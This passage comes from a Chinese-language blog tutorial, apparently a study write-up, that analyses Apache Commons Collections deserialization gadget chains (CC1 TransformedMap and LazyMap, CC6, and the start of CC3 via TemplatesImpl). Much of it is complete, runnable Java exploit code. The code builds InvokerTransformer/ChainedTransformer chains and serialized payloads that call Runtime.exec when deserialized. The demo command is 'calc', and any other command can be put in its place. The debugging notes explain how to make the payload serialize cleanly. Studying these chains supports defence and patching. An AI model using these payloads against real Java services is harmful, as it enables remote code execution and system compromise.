        Runtime runtime &#x3D; (Runtime)new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;).transform(getMethod);
&#x2F;&#x2F;        runtime.exec(&quot;calc&quot;)
        new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;).transform(runtime);</code></pre>

<p>这里可以看到其实我们真正需要输入的只有Runtime.class，剩下的都是前一个的输出，所以这里我们可以借助之前提的ChainedTransformer进行简化</p>
<pre class="language-java" data-language="java"><code class="language-java">Transformer[] t &#x3D; new Transformer[]&#123;
        new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125;),&#x2F;&#x2F;获得getMethod方法
        new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;),&#x2F;&#x2F;相当于getRuntime.invoke(null)，产生一个实例化的Runtime类型对象r
        new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;)
&#125;;&#x2F;&#x2F;执行r.exec(&quot;calc&quot;)
&#x2F;&#x2F;在InvokeTransformer中相当于
&#x2F;&#x2F;Method method &#x3D; r.getClass().getMethod(exec, String.class);
&#x2F;&#x2F;return method.invoke(r, calc);
ChainedTransformer chainedTransformer &#x3D; new ChainedTransformer(t);
chainedTransformer.transform(Runtime.class);</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319224440542.png" alt="image-20230319224440542"></p>
<h4 id="二、绕过readObject函数中的两个if判断"><a href="#二、绕过readObject函数中的两个if判断" class="headerlink" title="二、绕过readObject函数中的两个if判断"></a>二、绕过readObject函数中的两个if判断</h4><p>首先我们创建的hashmap里需要有值，不然memberValues为0，for循环也不会进入</p>
<p>第一个if判断，获取的是我们传入的注解的类里的成员方法，同时Hashmap里的key要和成员方法的名一样</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319225346525.png" alt="image-20230319225346525"></p>
<p>但是Override里并没有成员变量</p>
<pre class="language-none"><code class="language-none">public @interface Override &#123;
&#125;</code></pre>

<p>所以我们需要换一个，例如Target</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319225537236.png" alt="image-20230319225537236"></p>
<p>这时候就能满足第一个if判断了</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319225619950.png" alt="image-20230319225619950"></p>
<p>而第二个判断是否存在的也肯定满足，因此这个问题也解决了</p>
<h4 id="三、setValue中的内容应该是我们要调用的对象"><a href="#三、setValue中的内容应该是我们要调用的对象" class="headerlink" title="三、setValue中的内容应该是我们要调用的对象"></a>三、setValue中的内容应该是我们要调用的对象</h4><p>我们已经知道如果想达到命令执行的目的，必须有这样一个调用方式</p>
<p>chainedTransformer.transform(Runtime.class);</p>
<p>但是现在我们调试时可以看到</p>
<p>setValue里的参数是</p>
<pre class="language-none"><code class="language-none">new AnnotationTypeMismatchExceptionProxy(
    value.getClass() + &quot;[&quot; + value + &quot;]&quot;).setMember(
        annotationType.members().get(name))</code></pre>

<p>这时valueTransformers已经是是我们构造的ChainedTransformer，但value参数并不是我们想要的 Runtime.class</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319230640546.png" alt="image-20230319230640546"></p>
<p>因此这里还需要借助ConstantTransformer，它能将输入对象转换为一个固定的常量值</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319230210283.png" alt="image-20230319230210283"></p>
<p>也就是假设我们将Transformer数组的第一位加上new ConstantTransformer(Runtime.class)，也就相当于我们给ConstantTransformer返回的iConstant值设置为了Runtime.class</p>
<p>那么在执行到TransformedMap里的checkSetValue时，第一次的chainedTransformer.transform调用的是ConstantTransformer的transform，返回的内容是固定的Runtime.class，实质上就是相当于将第二次调用transform的value赋值成了Runtime.class，满足了我们想要的chainedTransformer.transform(Runtime.class)</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319231640825.png" alt="image-20230319231640825"></p>
<p>完整的exp为</p>
<pre class="language-java" data-language="java"><code class="language-java">package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class Main &#123;
    public static void main(String[] args) throws IOException, NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, ClassNotFoundException &#123;

        Transformer[] t &#x3D; new Transformer[]&#123;
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125;),
                new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;),
                new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;)
        &#125;;
        ChainedTransformer chainedTransformer &#x3D; new ChainedTransformer(t);

        &#x2F;&#x2F; InvokerTransformer exec &#x3D; new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;);

        HashMap map &#x3D; new HashMap();
        map.put(&quot;value&quot;,&quot;value&quot;);

        Map decorate &#x3D; TransformedMap.decorate(map, null, chainedTransformer);
&#x2F;&#x2F;
        &#x2F;&#x2F;创建AnnotationinvocationHandler的类对象
        Class&lt;?&gt; AIH_construct &#x3D; Class.forName(&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;);
        &#x2F;&#x2F;获取构造方法
        Constructor&lt;?&gt; declaredConstructor &#x3D; AIH_construct.getDeclaredConstructor(Class.class, Map.class);
        declaredConstructor.setAccessible(true);
        Object o &#x3D; declaredConstructor.newInstance(Target.class, decorate);
        ser(o);
        unser();


    &#125;
    public static void ser(Object obj) throws IOException &#123;
        ObjectOutputStream oos &#x3D; new ObjectOutputStream(Files.newOutputStream(Paths.get(&quot;ser.bin&quot;)));
        oos.writeObject(obj);
    &#125;
    public static void unser() throws IOException, ClassNotFoundException &#123;
        ObjectInputStream oi &#x3D; new ObjectInputStream(Files.newInputStream(Paths.get(&quot;ser.bin&quot;)));
        oi.readObject();
    &#125;
&#125;</code></pre>

<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>入口类是AnnotationinvocationHandler</p>
<p>执行类是InvokerTransformer </p>
<p>利用链是</p>
<p>AnnotationinvocationHandler -&gt; readObject</p>
<p>AbstractInputCheckedMapDecorator.MapEntry -&gt; setValue</p>
<p>TransformedMap -&gt; checkSetValue</p>
<p>InvokerTransformer -&gt; transform</p>
<p>使用到的工具类辅助利用链： </p>
<p>ConstantTransformer</p>
<p> ChainedTransformer</p>
<p> HashMap</p>
<h2 id="LazyMap链1"><a href="#LazyMap链1" class="headerlink" title="LazyMap链1"></a>LazyMap链1</h2><p>刚才我们分析完了TransformedMap链，接下来再来看LazyMap</p>
<h3 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h3><p>LazyMap类中的get方法调用了transform方法</p>
<pre class="language-java" data-language="java"><code class="language-java">public Object get(Object key) &#123;
    &#x2F;&#x2F; create value for key if key is not currently in the map
    if (map.containsKey(key) &#x3D;&#x3D; false) &#123;
        Object value &#x3D; factory.transform(key);
        map.put(key, value);
        return value;
    &#125;
    return map.get(key);
&#125;</code></pre>

<p>map中的containKey(key)方法是判断Map 集合对象中是否包含指定的键名。如果存在则返回true,反之,返回false</p>
<p>如果我们能让factory是InvokerTransformer 类，并且key为Runtime.class的话，也同样能完成命令执行的目的</p>
<p>先看一下factory的赋值过程</p>
<p>通过静态的decorate调用protected类型的构造方法</p>
<pre class="language-none"><code class="language-none">public static Map decorate(Map map, Transformer factory) &#123;
    return new LazyMap(map, factory);
&#125;</code></pre>

<p>这里两个参数和Transformed一样，所以要传的东西也一样，这里可以试着触发一下</p>
<pre class="language-java" data-language="java"><code class="language-java">        HashMap&lt;Object, Object&gt; objectObjectHashMap &#x3D; new HashMap&lt;&gt;();
        Transformer[] t &#x3D; new Transformer[]&#123;
&#x2F;&#x2F;                new ConstantTransformer(Runtime.class),
                new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125;),
                new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;),
                new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;)
        &#125;;
        ChainedTransformer chainedTransformer &#x3D; new ChainedTransformer(t);
        Map decorate &#x3D; LazyMap.decorate(objectObjectHashMap, chainedTransformer);
        decorate.get(Runtime.class);</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320155927956.png" alt="image-20230320155927956"></p>
<p>上面我们是手动调用的get方法，但是实际上并不会有给我们手动调用get方法的机会，因此我们就要找一个能触发get的方法了</p>
<p>还是我们熟悉的AnnotationInvocationHandler类，里面的invoke方法正好调用了get</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320160634867.png" alt="image-20230320160634867"></p>
<p>而memberValues属性的值也是在构造方法里进行的赋值，是可控的</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320160754287.png" alt="image-20230320160754287"></p>
<p>那要再考虑如何调用invoke</p>
<p>还记得我们提到过的动态代理吗？</p>
<p>要实现动态代理需要有一个实现了InvocationHandler接口的对象，而这个AnnotationInvocationHandler中恰好实现了InvocationHandler接口，动态代理会自动调用实现了InvocationHandler接口的对象中的invoke方法，于是我们可以使用动态代理的方法来调用invoke方法</p>
<pre class="language-java" data-language="java"><code class="language-java">&#x2F;&#x2F; 因为AnnotationInvocationHandler不是public的，所以需要通过反射去实例化
Class&lt;?&gt; aClass &#x3D; Class.forName(&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;);
Constructor&lt;?&gt; declaredConstructor &#x3D; aClass.getDeclaredConstructor(Class.class, Map.class);
declaredConstructor.setAccessible(true);
&#x2F;&#x2F;decorate 就是LazyMap.decorate返回的那个map变量。这时候memverValue就是我们构造好的Map了
InvocationHandler handler &#x3D; (InvocationHandler) declaredConstructor.newInstance(Override.class, decorate);
&#x2F;&#x2F; 构造动态代理
Map proxyMap &#x3D; (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] &#123;Map.class&#125;, handler);</code></pre>

<p>接下来去找我们的入口点，还是在AnnotationInvocationHandler的readObject 中，由于动态代理的缘故，</p>
<p>只要memberValue是我们构造的动态代理，就会在执行memberValues.entrySet前，先调用invoke方法，触发我们的调用链</p>
<p>所以我们还需要再用AnnotationInvocationHandler对这个proxyMap进行包裹。</p>
<pre class="language-java" data-language="java"><code class="language-java">Object invocationHandler &#x3D;  declaredConstructor.newInstance(Override.class, proxyMap);</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320170157464.png" alt="image-20230320170157464"></p>
<p>完整的exp为</p>
<pre class="language-java" data-language="java"><code class="language-java">package org.LazyMapSer;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Proxy;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class main &#123;
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException &#123;
        HashMap&lt;Object, Object&gt; objectObjectHashMap &#x3D; new HashMap&lt;&gt;();
        Transformer[] t &#x3D; new Transformer[]&#123;
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125;),
                new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;),
                new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;)
        &#125;;
        ChainedTransformer chainedTransformer &#x3D; new ChainedTransformer(t);
        Map decorate &#x3D; LazyMap.decorate(objectObjectHashMap, chainedTransformer);
&#x2F;&#x2F;        decorate.get(Runtime.class);
        Class&lt;?&gt; aClass &#x3D; Class.forName(&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;);
        Constructor&lt;?&gt; declaredConstructor &#x3D; aClass.getDeclaredConstructor(Class.class, Map.class);
        declaredConstructor.setAccessible(true);
        InvocationHandler handler &#x3D; (InvocationHandler) declaredConstructor.newInstance(Override.class, decorate);
        Object proxyMap &#x3D; Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] &#123;Map.class&#125;, handler);
        Object invocationHandler &#x3D;  declaredConstructor.newInstance(Override.class, proxyMap);

        ser(invocationHandler);
        unser();
    &#125;
    public static void ser(Object obj) throws IOException &#123;
        ObjectOutputStream oos &#x3D; new ObjectOutputStream(Files.newOutputStream(Paths.get(&quot;ser.bin&quot;)));
        oos.writeObject(obj);
    &#125;
    public static void unser() throws IOException, ClassNotFoundException &#123;
        ObjectInputStream oi &#x3D; new ObjectInputStream(Files.newInputStream(Paths.get(&quot;ser.bin&quot;)));
        oi.readObject();
    &#125;
&#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320171427321.png" alt="image-20230320171427321"></p>
<h3 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h3><p>入口类和执行类和TransformedMap链一样没变</p>
<p>入口类是AnnotationinvocationHandler</p>
<p>执行类是InvokerTransformer </p>
<p>调用链是：</p>
<p>AnnotationinvocationHandler -&gt; readObject</p>
<p>​                memberValues.entrySet()</p>
<p>AnnotationinvocationHandler  -&gt; invoke</p>
<p>LazyMap -&gt; get</p>
<p>​                ChainedTransformer.transform()</p>
<p>​                ConstantTransformer.transform()</p>
<p>InvokerTransformer -&gt; transform</p>
<p>使用到的工具类辅助利用链： </p>
<p>ConstantTransformer</p>
<p> ChainedTransformer</p>
<p> HashMap</p>
<p> Proxy</p>
<h1 id="CC6"><a href="#CC6" class="headerlink" title="CC6"></a>CC6</h1><h2 id="分析-2"><a href="#分析-2" class="headerlink" title="分析"></a>分析</h2><blockquote>
<p>先说一些前置知识</p>
<p>由于cc1的两条链都利用了AnnotationinvocationHandler中的readObject方法，导致在高版本的jdk中由于AnnotationinvocationHandler的readObject方法的修改而无法进行利用。但cc6的链并没有版本限制。</p>
<p>TiredMapEntry类官方的介绍是这可用于使映射条目能够在基础映射上进行更改，没太看懂，但是具体的效果是把输入的Map对象和Object对象以key=value的形式输出出来，Object对象是key。</p>
</blockquote>
<p>对LazyMap类中的get方法选择的不同的函数造成了CC1的另一条LazyMap链</p>
<p>在TiredMapEntry中也有一个调用get的方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320180756995.png" alt="image-20230320180756995"></p>
<p>恰好这个map和key也是在构造函数里赋值的，是我们可以控制的</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320180837381.png" alt="image-20230320180837381"></p>
<p>那么假设map是LazyMap类型，key是Runtime.class，就同样可以实现调用LazyMap.get()的目的了</p>
<p>接下来要去找哪里调用了getValue函数</p>
<p>同样是在TiredMapEntry类，hashCode函数</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320181128596.png" alt="image-20230320181128596"></p>
<p>可以手动调一下，前半部分和之前都一样</p>
<pre class="language-java" data-language="java"><code class="language-java">        HashMap&lt;Object, Object&gt; objectObjectHashMap &#x3D; new HashMap&lt;&gt;();
        Transformer[] t &#x3D; new Transformer[]&#123;
&#x2F;&#x2F;                new ConstantTransformer(Runtime.class),
                new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125;),
                new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;),
                new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;)
        &#125;;
        ChainedTransformer chainedTransformer &#x3D; new ChainedTransformer(t);
        Map decorate &#x3D; LazyMap.decorate(objectObjectHashMap, chainedTransformer);
        TiedMapEntry tiedMapEntry &#x3D; new TiedMapEntry(decorate, Runtime.class);
        tiedMapEntry.hashCode();</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320181416258.png" alt="image-20230320181416258"></p>
<p>后面就是怎么调hashCode了，如果跟过URLDNS的应该很容易想到就是HashMap</p>
<p>在HashMap重写的readObject里调用了hash函数，而hash函数里就调用了hashCode方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320181622385.png" alt="image-20230320181622385"></p>
<p>假设此时的key是tiedMapEntry，整个链子就能成功执行了</p>
<p>按照我们的想法，这个exp该这么构造</p>
<pre class="language-java" data-language="java"><code class="language-java">Transformer[] t &#x3D; new Transformer[]&#123;
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125;),
        new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;),
        new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;)
&#125;;
ChainedTransformer chainedTransformer &#x3D; new ChainedTransformer(t);
HashMap&lt;Object, Object&gt; objectObjectHashMap &#x3D; new HashMap&lt;&gt;();
objectObjectHashMap.put(&quot;sds&quot;,&quot;sss&quot;);
Map decorate &#x3D; LazyMap.decorate(objectObjectHashMap, chainedTransformer);
TiedMapEntry tiedMapEntry &#x3D; new TiedMapEntry(decorate,&quot;123&quot;);
HashMap&lt;Object, Object&gt; hashMap &#x3D; new HashMap&lt;&gt;();
hashMap.put(tiedMapEntry, &quot;123&quot;);
ser(decorate);
unser();</code></pre>

<h2 id="优化"><a href="#优化" class="headerlink" title="优化"></a>优化</h2><p>看起来链子很完美，但实际上如果真正运行不会运行成功</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320203448437.png" alt="image-20230320203448437"></p>
<p>他会提示java.lang.ProcessImpl这个类不能进行序列化，为什么会出现这个类呢，原因就是hashMap.put，</p>
<p>put方法会调用hashCode，然后调用TiedMapEntry类里的get方法，恰好get方法里还有个put</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320203656410.png" alt="image-20230320203656410"></p>
<p>而其中的value就是我们命令执行后的一个java.lang.ProcessImpl类型的值</p>
<p>导致执行完后decorate里的内容变为了</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320204007239.png" alt="image-20230320204007239"></p>
<p>造成了无法序列化的问题</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320204209453.png" alt="image-20230320204209453"></p>
<p>另外put后调用的LazyMap的get方法在map中没有这个key，也就是在decorate中没有对应的key时将这个key加入decorate，那么在反序列化时，由于decorate已经有了这个key，所以就不满足if判断，直接return了</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320231731235.png" alt="image-20230320231731235"></p>
<p>解决这两个问题都很好办，因为这个键值对的key就是TiedMapEntry里我们传入的第二个参数</p>
<p>所以用decorate.remove(tiedMapEntry.getKey());或者decorate.clear();删了就行（如果是用删除的方法，在用idea调试的过程中不要去看tiedMapEntry属性的值，因为这样会调用tiedMapEntry类中的toString，然后再调getValue，我们前边的删除就白删了）</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321180456163.png" alt="image-20230321180456163"></p>
<p>还有一个问题是如果objectObjectHashMap里有值，那么调用的HashMap里的readObject的key和value第一次就是objectObjectHashMap的key和value，第二次才会到hashMap的键值，很怪，不知道为什么。可能是因为两个HashMap对象反序列化的时候是一块调用的同一个readObject</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320231342833.png" alt="image-20230320231342833"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320214626642.png" alt="image-20230320214626642"></p>
<p>但如果没有值，key的值就是TiedMapEntry类型的对象</p>
<p>另外由于put的原因，所以在生成的时候也会调用我们的链，所以这里可以利用反射的方式去修改tiedMapEntry里的内容，让其不会执行命令。这里是修改LazyMap的内容</p>
<pre class="language-java" data-language="java"><code class="language-java">Class LazyMapClass &#x3D; LazyMap.class;
Field factory &#x3D; LazyMapClass.getDeclaredField(&quot;factory&quot;);
factory.setAccessible(true);
factory.set(decorate,chainedTransformer);</code></pre>

<p>在put后把factory的值改为我们构造的chainedTransformer，而在LazyMap初始化时的Transformer可以随便填一个Transformer，比如new ConstantTransformer(1)。另外这样还可以让在put时调用的LazyMap的get方法里的put就会变成123=1了，不会出现java.lang.ProcessImpl类型影响反序列化</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321180003691.png" alt="image-20230321180003691"></p>
<p>最终的payload为</p>
<pre class="language-java" data-language="java"><code class="language-java">package org;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class HashMapTest &#123;
        public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException &#123;


        Transformer[] t &#x3D; new Transformer[]&#123;
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125;),
                new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;),
                new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;)
        &#125;;
        ChainedTransformer chainedTransformer &#x3D; new ChainedTransformer(t);
        HashMap&lt;Object, Object&gt; objectObjectHashMap &#x3D; new HashMap&lt;&gt;();
        objectObjectHashMap.put(&quot;111&quot;,&quot;222&quot;);

        Map decorate &#x3D; LazyMap.decorate(objectObjectHashMap,new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry &#x3D; new TiedMapEntry(decorate,&quot;123&quot;);
        HashMap&lt;Object, Object&gt; hashMap &#x3D; new HashMap&lt;&gt;();
        hashMap.put(tiedMapEntry, &quot;123&quot;);

        Class LazyMapClass &#x3D; LazyMap.class;
        Field factory &#x3D; LazyMapClass.getDeclaredField(&quot;factory&quot;);
        factory.setAccessible(true);
        factory.set(decorate,chainedTransformer);

&#x2F;&#x2F;        decorate.remove(tiedMapEntry.getKey());
        decorate.clear();
        ser(hashMap);
        unser();
    &#125;
    public static void ser(Object obj) throws IOException &#123;
        ObjectOutputStream oos &#x3D; new ObjectOutputStream(Files.newOutputStream(Paths.get(&quot;ser.bin&quot;)));
        oos.writeObject(obj);
    &#125;
    public static void unser() throws IOException, ClassNotFoundException &#123;
        ObjectInputStream oi &#x3D; new ObjectInputStream(Files.newInputStream(Paths.get(&quot;ser.bin&quot;)));
        oi.readObject();
    &#125;
&#125;
</code></pre>

<h2 id="总结-2"><a href="#总结-2" class="headerlink" title="总结"></a>总结</h2><p>调用链为：</p>
<p>HashMap -&gt; readObject</p>
<p>TiedMapEntry -&gt; hashCode</p>
<p>TiredMapEntry -&gt; getValue</p>
<p>LazyMap -&gt; get</p>
<p>​                ChainedTransformer.transform()</p>
<p>​                ConstantTransformer.transform()</p>
<p>InvokerTransformer -&gt; transform</p>
<h1 id="CC3"><a href="#CC3" class="headerlink" title="CC3"></a>CC3</h1><p>CC3和上面写的CC1和CC6有不小的区别，最大的区别就是原本的 CC1 链与 CC6 链是通过 <code>Runtime.exec()</code> 进行命令执行。</p>
<p>而在CC3里，是通过动态类加载机制来执行恶意代码</p>
<h2 id="动态类加载机制"><a href="#动态类加载机制" class="headerlink" title="动态类加载机制"></a>动态类加载机制</h2><p>在类加载的过程中，我们知道字节码加载过程是</p>
<p>loadClass -&gt; findClass -&gt; defineClass</p>
<p>而在<a href="https://ethe448.github.io/2023/03/16/Java/#toc-heading-14">Java | Ethe&#39;s blog (ethe448.github.io)</a>的类加载机制的部分，我们展示了一种通过ClassLoader.defineClass 字节码加载任意类的攻击方式</p>
<p>不给单纯的调用defineClass是不能执行类的，若要执行就必须先进行实例化</p>
<p>而CC3恰好就是找到了利用defineClass并进行了实例化实现的反序列化攻击</p>
<h2 id="TemplatesImpl类"><a href="#TemplatesImpl类" class="headerlink" title="TemplatesImpl类"></a>TemplatesImpl类</h2><p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321205745553.png" alt="image-20230321205745553"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321205923522.png" alt="image-20230321205923522"></p>
<p>defineClass被重载了好几次，这里随便讲两个</p>
<p><code>name</code>为类名，<code>b</code>为字节码数组，<code>off</code>为偏移量，<code>len</code>为字节码数组的长度。</p>
<p>现在我们的 <code>defineClass()</code> 方法的作用域为 <code>protected</code>，我们需要找到作用域为 <code>public</code> 的类，方便我们利用。</p>
<p>IDEA里右键查找用法</p>
<p>最后会在TemplatesImpl.TransletClassLoader里找到一个可以利用的地方，这里没有标注作用域，也就是默认的default属性，在同一个包下可以访问</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321210813430.png" alt="image-20230321210813430"></p>
<p>我们再找一下调用它的函数</p>
<p>又被defineTransletClasses调用了，但是又是个private，所以还要接着找</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321211236734.png" alt="image-20230321211236734"></p>
<p>还是TemplatesImpl这个类，getTransletInstance调用了defineTransletClasses</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321211934212.png" alt="image-20230321211934212"></p>
<p>这里的_class值会在defineTransletClasses里赋值为defineClass加载后的字节码，然后再借助后面的newInstance就能实现恶意类的实例化，然后执行恶意代码。但是这个还是private，所以还要去找一个public的。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321223945893.png" alt="image-20230321223945893"></p>
<p>恰好这里就有一个</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321212359633.png" alt="image-20230321212359633"></p>
<p>找到这里之后我们就可以先想办法去利用我们之前找到的这些去试着动态加载类了</p>
<h2 id="TemplatesImpl利用"><a href="#TemplatesImpl利用" class="headerlink" title="TemplatesImpl利用"></a>TemplatesImpl利用</h2><p>理论上只要调用new TemplatesImpl()，然后调用newTransformer方法就能到达defineClass()，然后加载恶意类。但在这里面还有一些代码逻辑上的问题</p>
<p>首先这里遇到的问题就是在getTransletInstance方法里的两个if判断</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321220023834.png" alt="image-20230321220023834"></p>
<p>要让_name不为null，还要让_class为null</p>
<p>这两个都是类里的私有变量，而TemplatesImpl的公共的构造函数是个空函数</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321220203590.png" alt="image-20230321220203590"></p>
<p>也就是说我们只能利用反射的方式来进行赋值了</p>
<p>在defineTransletClasses里也有一个if判断</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321220909684.png" alt="image-20230321220909684"></p>
<p>_bytecodes不能为null，不然会直接抛出异常</p>
